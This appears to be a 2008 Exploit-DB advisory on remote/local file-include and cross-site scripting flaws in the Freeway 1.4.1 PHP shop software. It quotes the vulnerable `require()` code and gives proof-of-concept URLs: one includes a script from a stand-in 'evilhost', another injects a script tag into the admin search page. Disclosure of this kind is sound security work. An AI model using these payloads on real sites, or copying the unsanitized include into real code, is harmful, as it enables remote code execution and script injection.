Freeway 1.4.1 - Multiple Input Validation Vulnerabilities

2008-08-13T00:00:00
ID EDB-ID:32240
Type exploitdb
Reporter Digital Security Research Group
Modified 2008-08-13T00:00:00

Description

Freeway 1.4.1 Multiple Input Validation Vulnerabilities. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/30676/info

Freeway is prone to multiple remote file-include and cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.

Freeway 1.4.1.171 is affected; other versions may also be vulnerable. 

1. Multiple Remote/Local File Include

Example:

...
$command=isset($HTTP_GET_VARS['command'])?$HTTP_GET_VARS['command']:'';
...

if($command!="")
{
switch($command){
...
case 'include_page':
require($HTTP_GET_VARS['include_page']);
break;
...

http://www.example.com/[installdir]/admin/create_order_new.php=http://evilhost/info.php

Local File Include vulnerability found in script  includes/events_application_top.php

2. Linked XSS vulnerability

Example

http://www.example.com/[installdir]/admin/search_links.php"<script>a=/DSecRG_XSS/%0d%0aalert(a.source)</script>